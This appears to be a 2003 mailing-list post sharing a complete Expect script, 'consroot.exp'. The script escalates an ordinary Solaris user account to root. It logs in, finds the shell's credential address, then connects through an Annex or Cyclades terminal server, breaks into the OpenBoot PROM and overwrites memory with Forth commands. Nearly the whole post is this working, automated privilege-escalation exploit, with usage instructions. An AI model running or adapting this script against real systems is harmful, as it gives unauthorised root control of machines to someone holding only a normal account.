Hi there,

here is a fully automated script for getting a root shell using a normal user account
and (remote-)console acces. The Script was written by me based on an article
from phrack.com (article #53 - hacking forth by mudge)

---snip---
#
# ---> consroot.exp <---
# by mickeyX 16.6.2003
#
# connects to a SUN and a Terminalserver and hacks the OBP to get a root shell.
# You need:
# - a "normal" user account on a SUN
# - terminalserveraccess on the same SUN
#
# this was tested on:
# - MacOS X version 10.2.6 using expect 5.38.0
# - Solaris 8 using expect 5.25.0
# - ANNEX terminalservers
# - CYCLADES terminalservers
#
# This is just a prototype ! Use with care on other terminalservers !
#
#
set timeout 2
set MODE [lindex $argv 0]
set TARGET [lindex $argv 1]
set UID [lindex $argv 2]
set PW [lindex $argv 3]
set CTYPE [lindex $argv 4]
set TSERVER [lindex $argv 5]
set TPORT [lindex $argv 6]
set TPW [lindex $argv 7]
set LOG log.txt
proc usage {} {
puts "\nusage: expect consroot <
TERMINALSERVER> "
puts "\twhere MODE is one of:"
puts "\t\tT = Target is using TELNET"
puts "\t\tS = Target is using SSH"
puts "\tTARGET = machine to hack"
puts "\tUSER = unprivileged user on target host"
puts "\tPW = password on target host"
puts "\n\twhere CONSOLETYPE is one of:"
puts "\t\tA = Target is connected to Annex Terminalserver"
puts "\t\tC = Target is connected to Cyclades Terminalserver\n"
puts "\tTERMINALSERVER = consoleaccess for target host"
puts "\tPORT = TCP/IP-port (!) on terminalserver where target is connected"
puts "\tTPW = password for terminalserverport\n"
exit 1
}
###
# MAIN
###
if { $argc < 8 } usage
# check for Terminalservertypes...
switch -- $CTYPE \
A {
} C {
} default usage
# check for connect-Mode...
switch -- $MODE \
T { spawn telnet $TARGET
set main_session $spawn_id
expect "ogin:"
send "$UID\n"
expect "assword"
send "$PW\n"
} S { spawn ssh -l $UID $TARGET 
set main_session $spawn_id
expect "assword"
send "$PW\n"
} default usage
# start korn-shell...
expect { exp_continue }
send "exec /usr/bin/ksh\n"
# set defined prompt - so we can scan for it...
send "export PS1=PROMPT:\n"
# activate logging for getting credentials Adress...
log_file -noappend $LOG
###
# get adress for OBP-hacking:
###
send "/usr/bin/ps -o addr -p $$\n"
expect "ADDR"
expect "PROMPT:"
set ADRESS [exec sh "-c" "cat $LOG | grep -v PROMPT: | tail -1"]
puts "\nReceived ADRESS from shell was: $ADRESS\n"
###
###
###
# reset logfile...
exec sh "-c" "1>$LOG"
###
# get OS-architecture for OBP-hacking:
###
send "/usr/bin/isainfo -b\n"
expect "*" # clear expect buffer
expect "PROMPT:"
set ARC [exec sh "-c" "cat $LOG | tail -2 | head -1"]
puts "\nReceived Architecture was: $ARC\n"
exec "rm" "-f" "$LOG"
###
###
###
# connect to Terminalserver...
puts "\nPlease wait while connecting to Terminalserver...\n"
spawn telnet -e "#" $TSERVER $TPORT
switch -- $CTYPE \
A { puts "\nstarting Annex connect ...\n"
expect "Port password"
send "$TPW\n" 
expect "Permission granted"
} C { puts "\nstarting Cyclades connect ...\n"
expect "Port*:"
send "$TPW\n"
expect "Password:"
send "$TPW\n" 
expect "*"
}
# hack OBP...
send "#\n"
expect "telnet"
send "send brk\n"
expect "ok"
# let's ROCK and ROLL !!!
switch -- $ARC \
64 { send "hex 0 $ADRESS 20 + x@ 4 + l!\n"
} 32 { send "hex 0 $ADRESS 14 + l@ 4 + l!\n"
}
expect "ok"
send "go\r"
# deactivate logging...
log_file
exec rm "-f" "$LOG"
# give control to admin...
set spawn_id $main_session
send "\r"
expect "PROMPT:"
send "id\n"
expect "PROMPT:"
interact
---snip---

-- 
UNIX is like a wigwam: no windows, no gates, apache inside, stable.
Windows is not the answer - it's the question. No is the answer.